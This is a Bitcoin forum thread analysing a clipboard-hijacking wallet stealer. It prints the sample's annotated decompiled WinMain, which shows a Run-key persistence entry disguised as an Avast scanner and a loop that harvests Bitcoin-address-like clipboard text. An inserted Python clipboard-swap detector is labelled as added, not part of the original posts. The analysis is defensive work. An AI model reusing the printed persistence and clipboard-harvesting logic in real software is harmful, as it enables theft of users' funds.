Bitcoin Forum
Author Topic: "allseingbiteye" - a virus, or just weird?  (Read 2134 times)
ThePiachu
Sr. Member
Activity: 442
January 28, 2012, 03:45:25 AM
 #1

On the Bitcoin SE someone mentioned this site:
http://[wallet stealer].tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323

Has anyone checked whether this website is distributing some sort of virus?

1HWbVLhxj7bhewhyapMZpyhqWAeAhJd51E
My Bitcoin Calculator:
http://tpbitcalc.appspot.com/
grue
Global Moderator
Legendary
Activity: 1932
January 28, 2012, 04:10:28 AM
 #2

most likely a virus

decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  // Heap-allocated DWORD seeded with 33120; sub_401040() (not in the listing)
  // is compared against it twice below and gates which path is taken.
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  // Note the deliberate "trby": the real drop name is patched into place below.
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  // v24 lies 0x15 bytes into ExistingFileName (bp-13Ch vs bp-127h), i.e. on the
  // 'b' of "trby"; decrementing it gives 'a', so the string becomes
  // "c:\windows\mcfartietray.exe" only when the check passes.
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  // v17 is therefore true only if the byte patch above happened.
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      // Source of the copy below becomes the running executable's own path.
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  // First run: bFailIfExists=1, so the copy succeeds only when the drop does not
  // exist yet. Install it under HKLM\...\Run as "Avast72" (1u = REG_SZ,
  // 2u = KEY_SET_VALUE), launch the copy from c:\ and exit. On later runs
  // CopyFileA fails and execution falls through to the mutex check.
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  // Single-instance guard: 183 = ERROR_ALREADY_EXISTS.
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0; // decompiler artifact: v0 is never declared
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  // v20/v21/v22 form an MSVC std::string (size v21, capacity v22; the data is
  // stored inline while capacity < 16). It holds the last clipboard text seen.
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        // Poll CF_TEXT (1u) every 500 ms until the clipboard block is 30..39
        // bytes long (v6 - 30 > 9 is an unsigned range test).
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        // Copy the text out and pick the std::string's data pointer
        // (inline buffer if capacity < 16, otherwise the heap pointer).
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) ); // wait until the clipboard text actually changed
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        // Candidate passed the alphabet test; a Bitcoin address starts with
        // '1' (49) or '3' (51). The two routines applied to it are not in the
        // listing.
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        // Base58 alphabet check: reject anything outside 1-9, a-z, A-Z, and
        // the four characters Base58 omits: 'l' (108), 'I' (73), 'O' (79),
        // '0' (48). Any rejection restarts the outer polling loop.
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}
It adds a program to system startup. Pretty suspicious, imo.
Virus scan: https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
Runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html

It is pitch black. You are likely to be eaten by a grue.
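The clipboard loop in grue's decompilation is what makes this a wallet stealer rather than a generic dropper: it waits for a clipboard string that looks like a Bitcoin address and then hands it to two routines the listing does not include. The Python below is an added example written for this thread; it is not code from the forum posts or from the sample. It reproduces the loose address filter the decompiled loop applies, contrasts it with the strict Base58Check validation the sample does not bother with, and scans a clipboard history for the event a swapper produces: one valid address replaced by a different valid address within a couple of seconds. The clipboard history, the attacker address (built here from a made-up hash160 so it is valid by construction) and the 2-second window are assumptions of the example.

```python
"""Clipboard-hijacker detection logic. Added example for this thread, not code
from the posts or from the analysed sample."""
import hashlib
from typing import List, Optional, Tuple

BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def malware_filter(text: str) -> bool:
    """Approximation of the decompiled check: clipboard block of 30..39 bytes
    (here string length plus NUL; the sample uses GlobalSize, which can round
    up), every byte in the Base58 alphabet (the loop rejects anything outside
    1-9/a-z/A-Z plus the ambiguous 0, O, I, l), and a first char of '1' or '3'."""
    if not 30 <= len(text) + 1 <= 39:
        return False
    if any(c not in BASE58 for c in text):
        return False
    return text[0] in "13"


def _checksum(payload: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def base58check_encode(version: int, payload: bytes) -> str:
    """version byte + payload + 4-byte double-SHA256 checksum, in Base58."""
    raw = bytes([version]) + payload
    raw += _checksum(raw)
    n = int.from_bytes(raw, "big")
    digits = ""
    while n:
        n, rem = divmod(n, 58)
        digits = BASE58[rem] + digits
    pad = len(raw) - len(raw.lstrip(b"\x00"))  # each leading zero byte -> '1'
    return "1" * pad + digits


def base58check_decode(addr: str) -> Optional[Tuple[int, bytes]]:
    """Return (version, 20-byte payload) for a valid address, else None."""
    if not addr or any(c not in BASE58 for c in addr):
        return None
    n = 0
    for c in addr:
        n = n * 58 + BASE58.index(c)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(addr) - len(addr.lstrip("1"))
    raw = b"\x00" * pad + body
    if len(raw) != 25 or _checksum(raw[:21]) != raw[21:]:
        return None
    return raw[0], raw[1:21]


Observation = Tuple[float, str]  # (seconds since start, clipboard text)


def find_swaps(history: List[Observation], window: float = 2.0) -> List[Tuple[str, str]]:
    """Flag consecutive clipboard reads where one valid address became a
    different valid address within `window` seconds. A user re-copying an
    address takes longer and normally copies the same one; a swapper does
    this in the 500 ms polling interval seen in the sample."""
    swaps: List[Tuple[str, str]] = []
    prev: Optional[Observation] = None
    for t, text in history:
        if prev is not None:
            pt, ptext = prev
            if (text != ptext and t - pt <= window
                    and base58check_decode(ptext) is not None
                    and base58check_decode(text) is not None):
                swaps.append((ptext, text))
        prev = (t, text)
    return swaps


GENESIS_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # real, well-known P2PKH address
# "Attacker" address constructed from a made-up hash160 (assumption of the
# example), so it is guaranteed valid without referring to any real wallet.
ATTACKER_ADDR = base58check_encode(0, bytes.fromhex("11" * 20))

# Constructed clipboard history, not a real capture.
SAMPLE_HISTORY: List[Observation] = [
    (0.0, "meeting notes"),
    (5.0, GENESIS_ADDR),     # user copies the payee's address
    (5.5, ATTACKER_ADDR),    # half a second later it is someone else's: swap
    (30.0, "meeting notes"),
    (40.0, GENESIS_ADDR),
    (60.0, ATTACKER_ADDR),   # 20 s apart: an ordinary copy, not flagged
]

if __name__ == "__main__":
    for before, after in find_swaps(SAMPLE_HISTORY):
        print(f"clipboard swap: {before} -> {after}")
```

The filter in the sample is deliberately sloppy (it never checks the checksum, so a Base58-looking string of the right length is enough to trigger it), which is why the detector validates both the old and the new value before calling it a swap: a random alphanumeric token that happens to pass the loose filter will not satisfy Base58Check. On a real host the history would come from polling the clipboard the same way the sample does.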
dooglus
Legendary
Activity: 2002
January 28, 2012, 07:01:55 AM
 #3

Quote
decompiled winmain

That's pretty impressive.  What tool did you use to do that?

sveetsnelda
Hero Member
Activity: 644
January 28, 2012, 07:48:46 AM
 #4

It even makes the run entry look like it's an antivirus scanner (Avast72). :)

Most certainly a virus/malware/spyware.

14u2rp4AqFtN5jkwK944nn741FnfF714m7
CD-RW
Jr. Member
Activity: 57
February 14, 2012, 09:12:47 AM
 #5

Sorry for bumping, I found some new information...
A new link got added about a Bitcoin generator on some Tor forum.

"Bitcoin generator.exe", 51,735 bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/

I found this thread due to the fact that he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: seren1ty0wns@gmail.com

Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
MPOE-PR
Hero Member
Activity: 756
April 20, 2012, 12:50:06 AM
 #6

Quote
mcfartietray.exe

...McFartieTray?! Sounds foul either way.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.